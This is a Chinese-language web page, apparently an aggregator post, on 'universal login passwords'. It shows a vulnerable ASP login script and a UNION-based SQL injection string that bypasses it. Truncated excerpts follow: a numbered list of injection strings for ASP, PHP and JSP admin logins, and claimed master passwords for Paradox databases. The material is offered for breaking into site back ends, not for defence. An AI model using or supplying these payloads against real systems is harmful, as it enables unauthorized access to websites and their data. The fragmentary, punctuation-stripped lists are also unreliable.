新型萬能登入密碼
文章擷取如下:
網上有很多這樣的登陸驗證**
<%
username=trim(request.form("username"))
password=trim(request.form("password"))
sql="select * from admin where user='"&username&"'"
set rs=server.createobject("adodb.recordset")
rs.open sql,conn,1,1
if rs.eof then
checksysuser=false
else
passwd=trim(rs("pwd"))
if passwd=password then
session("admin")=username
checksysuser=true
else
checksysuser=false
end if
end if
rs.close
conn.close
if checksysuser=true then
response.redirect("main.asp")
else
errmsg="使用者名稱輸入有誤,請重新輸入!"
end if
%>
先在資料庫中查詢使用者名稱對應的密碼,然後再和使用者輸入的密碼對比,導致'or'='or'這樣的萬能登陸密碼失
效.但如果在上面的程式中,使用者名稱輸入' union select 1,1,1 from admin where ''=',密碼輸入1,就可以登陸成功,原理很簡單,就不多說了.順便附上oldjun的語句:' union select 1,1,1 as pwd from admin where ''='
萬能密碼 php,PHP萬能密碼
說實話如果乙個 的前台都是注入漏洞,那麼憑經驗,萬能密碼進後台的機率基本上是百分之百。可是有的人說對php的站如果是gpc魔術轉換開啟,就會對特殊符號轉義,就徹底杜絕了php注入。其實說這話的人沒有好好想過,更沒有嘗試過用萬能密碼進php的後台。其實gpc魔術轉換是否開啟對用萬能密碼進後台一點影響也...
asp aspx php jsp萬能密碼
asp aspx萬能密碼 1 or a a 2 or a a 3 or 1 1 4 or 1 1 5 a or 1 1 6 or 1 1 7 or a a 8 or a a 9 or 10 or or 11 1 or 1 1 1 12 1 or 1 1 or 1 1 13 or 1 1 00 14 ...
PARADOX DB 萬能密碼
paradox資料庫的萬能密碼 如果是paradox,請用此萬能密碼 jiggae 還有 nx66ppx 注意大小寫 version password paradox 7 jiggae or cupcdvum paradox 5 jiggae or cupcdvum paradox 4 nx66pp...